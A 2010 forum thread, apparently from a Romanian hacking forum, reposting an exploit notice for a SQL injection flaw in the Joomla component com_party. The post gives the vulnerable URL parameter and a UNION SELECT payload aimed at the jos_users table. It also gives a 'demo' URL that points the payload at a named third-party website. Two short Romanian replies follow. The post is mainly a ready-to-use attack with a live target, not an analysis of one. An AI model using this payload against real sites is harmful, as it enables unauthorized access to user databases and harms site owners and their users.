begood Posted March 12, 2010 Report Posted March 12, 2010 # Title : Joomla Component com_party SQL Injection Vulnerability # Author: DevilZ TM# Data : 2010-03-14[~]######################################### InformatioN #############################################[~][~] Title : Joomla Component com_party SQL Injection Vulnerability [~] Author : DevilZ TM By D3v1l[~] Homepage : http://www.DEVILZTM.com[~] Contact : DevilZTM@Gmail.CoM & D3v1l.blackhat@yahoo.com[~]######################################### ExploiT #################################################[~][~] Vulnerable File :http://127.0.0.1/index.php?option=com_party&view=party&task=details&id=[SQL][~] ExploiT :-1/**/UNION/**/SELECT/**/1/**/FROM/**/jos_users/*[~] Example :http://127.0.0.1/index.php?option=com_party&view=party&task=details&id=-1/**/UNION/**/SELECT/**/1/**/FROM/**/jos_users/*[~] Demo :http://www.bollywoodvillage.com/index.php?option=com_party&view=party&task=details&id=-1/**/UNION/**/SELECT/**/1/**/FROM/**/jos_users/*[~]######################################### ThankS To ... ############################################[~][~] Special Thanks To My Best FriendS :Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS[~] IRANIAN Young HackerZ[~]######################################## FinisH #################################################[~] Quote
alex.angels Posted March 28, 2010 Report Posted March 28, 2010 (edited) mai pe romaneste ?//mai pe romaneste ratati ca tine isi iau ban Edited March 28, 2010 by begood Quote
go_sword Posted March 28, 2010 Report Posted March 28, 2010 invata ce e ala sql injection si apoi poti sa te uiti la sectiunea exploits..asa numa sa te afli in treaba n-are rost ca nu intelegi nimic Quote